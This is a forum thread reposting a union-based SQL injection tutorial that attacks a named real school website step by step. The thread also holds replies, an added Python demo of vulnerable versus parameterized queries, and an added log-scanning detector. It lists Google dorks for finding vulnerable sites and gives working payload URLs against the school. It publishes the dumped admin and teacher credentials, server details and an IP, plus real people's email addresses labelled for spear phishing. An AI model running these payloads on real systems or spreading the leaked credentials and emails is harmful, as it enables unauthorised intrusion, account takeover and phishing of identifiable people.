GreySec Forums

Full Version: SQL Injection [Union Based]
Note: I got permission to repost Daisuke's tutorials on Hacksociety. I thought it would be a waste not to post them here as well. Daisuke Dan, if you're reading this and have decided to pick up your activity on GreySec, I will transfer these to your account.
 
Credits: Daisuke Dan

 
 
[Image: DAISUKEE.png]
"Daisuke's katana can slay any security"
==========================

 
SQL Injection Union Based (Tutorial with screens)

 
0x00FFF#~ Summary
0x1 - Introduction
0x2 - Attack
0x3 - Links
0x4 - Credits & Authors

 
 
0x1#~ Introduction
 
# What is SQL Injection?
A SQL injection attack consists of the insertion or "injection" of a SQL query via the input data sent from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), and execute administration operations on the database.
 
[?] Info:
- It's a flaw in the web application, not in the database or the server.
- Can be injected into: Cookies, Forms, and URL parameters.

 
(What are Cookies ? http://en.wikipedia.org/wiki/HTTP_cookie)
# Why UNION?
The UNION operator is used in SQL injections to join a query, purposely forged by the tester, to the original query. The result of the forged query will be joined to the result of the original query, allowing the tester to obtain the values of columns of other tables.  
 
0x2#~ Attack
 
# Here is a list of d0rks to find SQL vulnerabilities:
A lot of these sites have already been hacked by others, but the list is useful for training!
Code:
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurllay_old.php?id=
inurl:declaration_more.php?decl_id=
inurlageid=
inurl:games.php?id=
inurlage.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=d=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:fiche_spectacle.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurltray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?av
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurlreview.php?id=
inurl:loadpsb.php?id=
inurlpinions.php?id=
inurl:spr.php?id=
inurlages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurlarticipant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurlrod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurlerson.php?id=
inurlroductinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurlrofile_view.php?id=
inurl:category.php?id=
inurlublications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurlrod_info.php?id=
inurl:shop.php?do=part&id=
inurlroductinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurlroduct.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurlroduit.php?id=
inurlop.php?id=
inurl:shopping.php?id=
inurlroductdetail.php?id=
inurlost.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurlage.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurlroduct_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:tran******.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:review.php?id=
inurl:loadpsb.php?id=
inurl:ages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurlpinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurlffer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
inur l: info.php?id=
inurl : pro.php?id=
inurl:shop+php?id+site:fr
"inurl:admin.asp"
"inurl:login/admin.asp"
"inurl:admin/login.asp"
"inurl:adminlogin.asp"
"inurl:adminhome.asp"
"inurl:admin_login.asp"
"inurl:administratorlogin.asp"
"inurl:login/administrator.asp"
"inurl:administrator_login.asp"
inurl:"id=" & intext:"Warning: mysql_fetch_assoc()
inurl:"id=" & intext:"Warning: mysql_fetch_array()
inurl:"id=" & intext:"Warning: mysql_num_rows()
inurl:"id=" & intext:"Warning: session_start()
inurl:"id=" & intext:"Warning: getimagesize()
inurl:"id=" & intext:"Warning: is_writable()
inurl:"id=" & intext:"Warning: getimagesize()
inurl:"id=" & intext:"Warning: Unknown()
inurl:"id=" & intext:"Warning: session_start()
inurl:"id=" & intext:"Warning: mysql_result()
inurl:"id=" & intext:"Warning: pg_exec()
inurl:"id=" & intext:"Warning: mysql_result()
inurl:"id=" & intext:"Warning: mysql_num_rows()
inurl:"id=" & intext:"Warning: mysql_query()
inurl:"id=" & intext:"Warning: array_merge()
inurl:"id=" & intext:"Warning: preg_match()
inurl:"id=" & intext:"Warning: ilesize()
inurl:"id=" & intext:"Warning: filesize()
inurl:"id=" & intext:"Warning: require()
inurl:index.php?id=
inurl:trainers.php?id=
inurl:login.asp
index of:/admin/login.asp
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:Stray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:ogl_inet.php?ogl_id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:produit.php?id=+site:fr
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:pages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=

 
#------------------------------------------------------------------------------------+
| I have found a vulnerable website; I am not responsible for any damage you do.
| I prefer to make a tutorial on a real site, to be in a real situation :ninja:
#------------------------------------------------------------------------------------+
 
#[1] Find the vulnerable parameter
Quote:hxxp://dbhspgoa.edu.in/Article.php?id=92 (no error)
hxxp://dbhspgoa.edu.in/Article.php?id=92' (error)

"Why error? I don't see any error message ???"
It's normal; in this case the error is the blank page:
[Image: iPfh7Uw.png]
 
#[2] Find the number of columns
What we're about to do is find how many columns the page's query returns, using the error / no error responses.
 
Start by appending order by 100-- and lower the number until the error disappears:
Quote:hxxp://dbhspgoa.edu.in/Article.php?id=92 order by 100-- (error)
hxxp://dbhspgoa.edu.in/Article.php?id=92 order by 50-- (error)
hxxp://dbhspgoa.edu.in/Article.php?id=92 order by 15-- (error)
hxxp://dbhspgoa.edu.in/Article.php?id=92 order by 10-- (error)
hxxp://dbhspgoa.edu.in/Article.php?id=92 order by 9-- (no error)

 
order by 9 displays correctly while order by 10 errors, so the query returns 9 columns:
[Image: F86KJsY.png]
 
#[3] Time to execute the UNION SELECT statement
Our UNION SELECT has to return the same number of columns, 9:
Quote:hxxp://dbhspgoa.edu.in/Article.php?id=92 and 0 union select 1,2,3,4,5,6,7,8,9--

Wow, the number 4 appears: the 4th column is the one whose content the page prints, so that's where we'll extract the database from:
[Image: lCSZvNf.png]
 
#[4] Information
 
Now that we know where to inject, we can gather some information about the database by placing a query in the displayed column, using concat(the query()):
 
Examples:
- version()
Quote:http://dbhspgoa.edu.in/Article.php?id=92 and 0 UNION SELECT 1,2,3,concat(version()),5,6,7,8,9--

[Image: GzQpvav.png]
- @@datadir
Quote:http://dbhspgoa.edu.in/Article.php?id=92 and 0 UNION SELECT 1,2,3,@@datadir,5,6,7,8,9--

[Image: cfrF1is.png]
- @@hostname
Hmm, I don't know why it doesn't work on this site.
 
- database()
Quote:http://dbhspgoa.edu.in/Article.php?id=92 and 0 UNION SELECT+1,2,3,concat(database()),5,6,7,8,9--

[Image: QFslYdF.png]
- user()
Quote:hxxp://dbhspgoa.edu.in/Article.php?id=92 and 0 UNION SELECT 1,2,3,concat(user()),5,6,7,8,9--

[Image: Wg2XTzz.png]
- show all
Quote:hxxp://dbhspgoa.edu.in/Article.php?id=92 and 0 UNION SELECT 1,2,3,group_concat(database(),0x3c62723e,version(),0x3c62723e,@@datadir,0x3c62723e,user()),5,6,7,8,9--

0x3c62723e is the string <br> converted to hex and prefixed with 0x, so each value is printed on its own line.
[Image: qAa4dLp.png]
 
First let's look at the functions we're going to use to extract table names (important):
Quote:group_concat = concatenates every row of the result into one string, so all the table names fit in the single displayed column
table_name = the column of information_schema.tables that holds the table names to be shown on screen
from = the table the data is selected from
information_schema.tables = MySQL's built-in catalogue listing every table in every database
table_schema = the database (schema) a table belongs to
database() = the database the website is currently using
0x0a = the newline character in hex, used to separate the table names

 
#[5] Show all tables of the database
Applying the functions mentioned above:
Quote:hxxp://dbhspgoa.edu.in/Article.php?id=92 and 0 UNION SELECT 1,2,3,group_concat(table_name,0x0a),5,6,7,8,9 from information_schema.tables where table_schema=database()--

 
You should see this:
Code:
allumni ,article ,attendance_setting ,banner ,banner_zone ,content ,course ,csv ,division ,events ,ex_student ,exam_desc ,exam_setting ,exam_subjtotal ,exam_type ,final_grading ,grace ,grade_subject ,grading ,groups ,lecture_attendance ,login ,login_admin ,magazines ,mrksht ,navigation ,news ,notice ,photo_category ,photo_details ,pictures ,school_accnt ,schooldays_total ,semester ,standard ,standard_desc ,stream_desc ,stud_history ,stud_score ,student ,student_admission ,student_attendance ,student_exam ,student_grace ,student_grade ,student_gradesubject ,student_subject ,student_ya ,student_yrassessment ,subject ,tags ,tb_excelupload ,tb_quicklinks ,tb_videos ,teacher ,teacher_classes ,teacher_sub_assign ,teacher_subjects ,template ,thoughtforday ,year_assessment ,year_desc

 
Wow, there are two interesting tables: login and login_admin! Hmm, "admin", I love this kind of table :troll:
[Image: zlIhpuG.png]
 
#[6] Extract data from the tables
 
'login' seems to have user information stored in it.
'login_admin' seems to have admin information stored in it.
 
To do this, we have to alter the query a bit. Look closely at this syntax:
Quote:
http://dbhspgoa.edu.in/Article.php?id=92 and 0 UNION SELECT 1,2,3,group_concat(column_name,0x0a),5,6,7,8,9 from information_schema.columns where table_name=0x6c6f67696e5f61646d696e--

 
We need to replace:
table_name = replaced by "column_name"
information_schema.tables = replaced by "information_schema.columns"
table_schema = replaced by "table_name"
database() = replaced by "0x6c6f67696e5f61646d696e--" (the table name login_admin in hex, followed by the -- comment)
 
Prefixing the hex with "0x" lets MySQL read it as a string, so the table name needs no quotes. To query that table with the syntax above, we have to convert its name to hex. If you are using the Firefox HackBar like me, you can do it like this:
 
[Image: sfYjirc.png]
 
And the result will be: 0x44616973756b65a
 
[Image: ofq1KlS.png]
 
Or: http://www.string-functions.com/hex-string.aspx
 
So! After running the injection against the table login_admin, we get 4 columns: admin_id, usernme, passwrd, logtime
[Image: MIyNZpo.png]
 
Let's look at the functions we replaced and what they do:
Quote:group_concat(column_name,0x0a) = groups the column names we're going to extract, one per line
information_schema.columns = MySQL's catalogue of every column in every table
table_name = restricts the lookup to the columns of one specific table
0xHEX_Code_Table = that table's name converted to hex

 
Now extract those columns:
Quote:hxxp://dbhspgoa.edu.in/Article.php?id=92 and 0 UNION SELECT 1,2,3,group_concat(admin_id,0x0a,passwrd,0x0a,logtime,0x0a,usernme,0x0a),5,6,7,8,9 from login_admin--

 
It shows the admin credentials:
admin_id passwrd logtime usernme
13¢PÉÜœz;þß„mJ…  2014-02-11 01:25:09 admin
 
 
[Image: JumnMiy.png]
 
You can try with whichever table you want. I use the same injection for the table login:
 
Quote:
http://dbhspgoa.edu.in/Article.php?id=92 and 0 UNION SELECT 1,2,3,group_concat(column_name,0x0a),5,6,7,8,9 from information_schema.columns where table_name=0x6c6f67696e--

 
[Image: WFma7bu.png]
 
Then
 
Quote:
http://dbhspgoa.edu.in/Article.php?id=92 and 0 UNION SELECT 1,2,3,group_concat(a_id,0x0a,aname,0x0a,apass,0x3c62723e),5,6,7,8,9 from login--

 
[Image: OHWS0B2.png]
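As an added example (not part of Daisuke's tutorial), here is a toy version of the Article.php page written in Python against an in-memory SQLite database, with the string-concatenated query beside a parameterized one. The table, column and row contents are constructed; SQLite has no information_schema, so the table-listing step is not reproduced, but the stray quote, ORDER BY and UNION SELECT probes from steps 1 to 3 behave as described above, and the template prints only the 4th column, which is why only that column's value ever shows on the page.

```python
import sqlite3

# Constructed toy schema: nine columns so the ORDER BY / UNION counts match the
# tutorial; names and contents are made up, not the site's real data.
SCHEMA = """
CREATE TABLE article(id INTEGER, title TEXT, author TEXT, body TEXT,
                     c5 TEXT, c6 TEXT, c7 TEXT, c8 TEXT, c9 TEXT);
INSERT INTO article VALUES(92, 'Welcome', 'staff', 'School news body',
                           '', '', '', '', '');
CREATE TABLE login_admin(admin_id INTEGER, usernme TEXT, passwrd TEXT, logtime TEXT);
INSERT INTO login_admin VALUES(1, 'admin', 'HASH-PLACEHOLDER', '2014-01-01 00:00:00');
"""


def build_db():
    con = sqlite3.connect(":memory:")
    con.executescript(SCHEMA)
    return con


def render(rows):
    # The page template prints only the 4th column (body) of each row.
    # Whatever lands in the other eight columns never reaches the browser,
    # which is why only "4" shows up after the UNION SELECT 1,...,9 probe.
    return [row[3] for row in rows]


def vulnerable_page(con, id_param):
    # Vulnerable: the raw ?id= value is pasted into the SQL text.
    sql = ("SELECT id,title,author,body,c5,c6,c7,c8,c9 FROM article "
           "WHERE id=" + id_param)
    try:
        return "ok", render(con.execute(sql).fetchall())
    except sqlite3.Error as exc:
        # The real site showed a blank page here; we return the message.
        return "error", str(exc)


def safe_page(con, id_param):
    # Fixed: reject non-numeric ids, then bind the value as a parameter.
    # Even without the digit check the bound value is compared as data,
    # so a UNION inside it is never parsed as SQL.
    if not id_param.isdigit():
        return "error", "invalid id"
    sql = "SELECT id,title,author,body,c5,c6,c7,c8,c9 FROM article WHERE id=?"
    return "ok", render(con.execute(sql, (int(id_param),)).fetchall())


if __name__ == "__main__":
    con = build_db()
    probes = ["92", "92'", "92 order by 100--", "92 order by 9--",
              "92 and 0 union select 1,2,3,4,5,6,7,8,9--"]
    for p in probes:
        print(f"{p!r:50} vulnerable={vulnerable_page(con, p)} safe={safe_page(con, p)}")
```

Run it and compare the two columns of output: the concatenated query errors on the quote and on order by 100, accepts order by 9, and prints 4 for the UNION probe exactly as in the screenshots, while the parameterized version answers only plain integer ids.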
 
The final dump:
Code:
 ____        _           _         
|  _ \  __ _(_)___ _   _| | _____  
| | | |/ _` | / __| | | | |/ / _ \
| |_| | (_| | \__ \ |_| |   <  __/
|____/ \__,_|_|___/\__,_|_|\_\___|
            /\  The Hackers Bay | The Hackers Boat
/vvvvvvvvvvvv \--------------------------------------,
`^^^^^^^^^^^^ /====================================="
            \/
            
            
http://dbhspgoa.edu.in
goaed_ucation
5.0.37-standard
/var/lib/mysql/
goaed_ucationu@72.35.83.36
 
===============table admin================
admin_id, usernme, passwrd, logtime
1 3¢PÉÜœz;þß„mJ… 2014-02-11 01:25:09 admin  
 
===============table login================
a_id ,aname ,apass ,logtime ,fullname ,atype ,t_status ,a_schid ,school_news ,school_attendance ,school_magazine ,school_marksht ,school_stud ,school_allum ,school_content ,school_daythought ,school_event ,school_nav ,school_ban ,school_photo ,school_art ,school_courses ,school_teacher ,school_grace ,school_report ,school_admission ,school_testimonial ,school_excelsheet  
 
1 admin admin
,2 sanjeevh sanjeev
,3 teacher1cc teacher1cc
,4 teacher12gg teacher12gg
,5 teacher122 teacher122
,6 teacher100 teacher100
,7 teacher155 teacher155
,8 teacher177 teacher177
,9 teacher277 teacher277
,11 fragnel f2009
,12 test M»`¹¾l‚L:­d)µ¦Á
,13 donbosco De©«vý¹`MáúK
,14 pccc2010 †ÉZ¶ºšb˜C$‹4-|
,15 Roy W$÷_5g:¹ò@ÝÞ
,16 Principal ¿¦o¹ƒ4º~ÂëÞʲP
,17 francis ›Ùó ¹ÈìÕ'ꊡ¸†#
,18 xavmartin ›Ùó ¹ÈìÕ'ꊡ¸†#
,20 ishaniroy •¹òÄ xR¾–îƒSû³X
,22 namdevg >y Œö÷Úèá’#qž
,23 oscarn Ò² «5ÅÆl5B«ƒ3õc
,24 soniyas ´oÀ7#ÆWâ²Ë“ðû
,25 hclerk t/#`eó´©ýŠ†ê
,29 satishsanvol .óÜ:¿#ÿ²£Á3cw
,30 stmichael_e4r Ün‘šÆ‡H3«CÙS„-
,31 test ص¦†õ%„p8B×€bYàÛ
,32 test1 Ïf¥ÓeÜ9ê„š¨¬ó
,33 zantye ¢ ååçêaGÿF0c]Ì
 
================Misc================
Apache 1.3.41  
FrontPage/5.0.2.2510  
Apache module mod_perl/1.29 FrontPage/5.0.2.2510  
Mod SSL 2.8.31  
Open SSL 0.9.8b  
PHP 4.4.8  
 
Emails on dbhspgoa.edu.in (Spear phishing)
shaunakdsilva@yahoo.com  
bhatimax@gmail.com  
raunaq.ep@gmail.com  
ikasrikant@hotmail.com  
francisloves01@yahoo.com  
rishiwrite@gmail.com  
reuben.rebelo@rediff.com  
mobypirate@hotmail.com  
avesh.mahagaokar@hotmail.com  
mak.man@live.com  
clint.rb@rediffmail.com  
principal@dbhspgoa.edu.in  
jnmoses2000@yahoo.com  
maheshverma124@gmail.com  
reube.rebelo@rediff.com  
yamuna.bepari@gmail.com  
ethanferns4@gmail.com  
greynomenezes@gmail.com  
anthonydcosta95@gmail.com  
edesa@yahoomail.com  
dboscopanjim@yahoo.co.in

 
____________________________________________________________
 
0x3#~ Links
- http://hakipedia.com/index.php/SQL_Injection
- http://hex.online-toolz.com/tools/text-h...vertor.php
- https://www.owasp.org/index.php/XSS_Filt...heat_Sheet
 
0x4#~ Credits & Authors
Daisuke Dan - TheHackersBay
Penetration testing, Research Team
 
Have a nice day !  :ninja:
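As a defender-side added example (not part of the tutorial), the following Python script scans web-server access log lines for the probes this walkthrough uses: a stray quote after a numeric id, ORDER BY column counting, UNION SELECT, information_schema lookups, 0x hex literals and @@ server variables. The log lines, IP addresses and paths are constructed; the payloads mirror those shown above, and the last line is a benign search that the patterns must not flag.

```python
import re
from collections import Counter
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Constructed Apache combined-format log lines (IPs and paths are made up; the
# payloads are the probes shown in the tutorial). The final line is a benign
# search that must not be flagged.
SAMPLE_LOG = r'''
203.0.113.5 - - [06/Dec/2016:04:10:01 +0000] "GET /Article.php?id=92 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [06/Dec/2016:04:10:07 +0000] "GET /Article.php?id=92%27 HTTP/1.1" 200 312 "-" "Mozilla/5.0"
203.0.113.5 - - [06/Dec/2016:04:10:15 +0000] "GET /Article.php?id=92+order+by+100-- HTTP/1.1" 200 312 "-" "Mozilla/5.0"
203.0.113.5 - - [06/Dec/2016:04:10:21 +0000] "GET /Article.php?id=92%20order%20by%209-- HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [06/Dec/2016:04:10:40 +0000] "GET /Article.php?id=92+and+0+UNION+SELECT+1,2,3,4,5,6,7,8,9-- HTTP/1.1" 200 4801 "-" "Mozilla/5.0"
203.0.113.5 - - [06/Dec/2016:04:11:02 +0000] "GET /Article.php?id=92+and+0+UnIoN+SeLeCt+1,2,3,group_concat(table_name,0x0a),5,6,7,8,9+from+information_schema.tables+where+table_schema=database()-- HTTP/1.1" 200 6200 "-" "Mozilla/5.0"
198.51.100.9 - - [06/Dec/2016:04:12:00 +0000] "GET /Article.php?id=93 HTTP/1.1" 200 5090 "-" "Mozilla/5.0"
198.51.100.9 - - [06/Dec/2016:04:12:30 +0000] "GET /search.php?q=union+members+select+committee HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
'''

# Apache combined format: client ip, timestamp, request line, status code.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

# Signatures are matched against each decoded query-string value, in this order.
SIGNATURES = [
    ("quote after numeric id", re.compile(r"^\s*\d+\s*'")),
    ("order-by column probe", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("union select", re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)),
    ("schema enumeration", re.compile(r"\binformation_schema\.", re.I)),
    ("hex string literal", re.compile(r"\b0x[0-9a-f]{2,}\b", re.I)),
    ("server variable", re.compile(r"@@\w+")),
]


def decode_params(target):
    """Split the query string and decode each value twice, so that
    double-encoded payloads (%2527 for a quote) are inspected as well."""
    query = urlsplit(target).query
    return [(k, unquote_plus(v)) for k, v in parse_qsl(query, keep_blank_values=True)]


def scan_log(text):
    """Return one finding per request whose parameters match any signature."""
    findings = []
    for line in text.strip().splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a request we can parse; skip rather than guess
        for name, value in decode_params(m.group("target")):
            hits = [label for label, rx in SIGNATURES if rx.search(value)]
            if hits:
                findings.append({"ip": m.group("ip"), "time": m.group("ts"),
                                 "param": name, "value": value, "hits": hits})
    return findings


def probe_sources(findings):
    """Count findings per client IP; a single source walking through quote,
    ORDER BY and UNION probes in sequence is the signature of this workflow."""
    return dict(Counter(f["ip"] for f in findings))


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ip']} {f['time']} {f['param']}={f['value']!r} -> {', '.join(f['hits'])}")
    print(probe_sources(scan_log(SAMPLE_LOG)))
```

Note that the patterns are matched on the decoded parameter value, not on the raw request line, so `+`, `%20` and mixed-case keywords are all caught; in a real deployment you would also want to correlate the sequence per client, since a single benign query containing the word UNION is far less interesting than one IP stepping through quote, ORDER BY and UNION probes within a minute.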
Quote:hxxp://dbhspgoa.edu.in/Article.php?id=92 and 0 union select 1,2,3,4,5,6,7,8,9--
Wow, the number 4 appears, the 4th column is vulnerable to SQL injection and we'll extract the database from here:
#[4] Informations
 
Now we know where to inject ... concat(the query())

This is very well put together, cool to see it step by step.

I'm confused why we have to work through column 4.
Is this just because column 4 is the same data type as the real query and hence why it was the only one to display? I guess it is probably the same column itself.

Would "union all attack_code" have worked too?
(12-06-2016, 04:32 AM)StickFigure Wrote: [ -> ]This is very well put together, cool to see it step by step.

I'm confused why we have to work through column 4.
Is this just because column 4 is the same data type as the real query and hence why it was the only one to display? I guess it is probably the same column itself.

Would "union all attack_code" have worked too?

You have to use column 4 for the query input in this case because it's the vulnerable column. Only the columns prone to SQL injection will successfully take your input, at least in this case and this type of injection.

While doing: hxxp://dbhspgoa.edu.in/Article.php?id=92 and 0 union select 1,2,3,4,5,6,7,8,9--

See output:
[Image: lCSZvNf.png]

The number 4 is marked out, thus that's the vulnerable column which should be used for the injection input.

Can't say whether or not "union all attack_code" will work since I have never tried it, but in my experience I believe it will not work the way you'd want it to. You see the query, the vulnerable column will be displayed; sometimes it's hidden though, but you can usually find it in the source code. Or depending on what kind of SQL injection, there are cases where injections are done through HTTP headers or cookies iirc.

But no, it shouldn't be possible to just union select all columns; you need the execution of the query to be made inside the vulnerable column. Although there are some cases where you can find 3 or 4 different vulnerable columns in the same injection. The normal praxis in my experience in those cases is to always choose the lowest integer/column for the injection (for ease and usability). But I believe it would probably be possible to do injection to several columns at the same time, if we take into account that all those columns are vulnerable.
(12-06-2016, 05:41 AM)Insider Wrote: [ -> ]The number 4 is marked out, thus that's the vulnerable column which should be used for the injection input.

Can't say whether or not "union all attack_code" will work since I have never tried it, but in my experience I believe it will not work the way you'd want it to. You see the query, the vulnerable column will be displayed; sometimes it's hidden though, but you can usually find it in the source code. Or depending on what kind of SQL injection, there are cases where injections are done through HTTP headers or cookies iirc.

But no, it shouldn't be possible to just union select all columns; you need the execution of the query to be made inside the vulnerable column. Although there are some cases where you can find 3 or 4 different vulnerable columns in the same injection. The normal praxis in my experience in those cases is to always choose the lowest integer/column for the injection (for ease and usability). But I believe it would probably be possible to do injection to several columns at the same time, if we take into account that all those columns are vulnerable.

Ah, I see now. I was only looking at half the picture; of course the data needs to be pushed onto the page. For some reason I was thinking the PHP functions were being evaluated as they got passed to the query.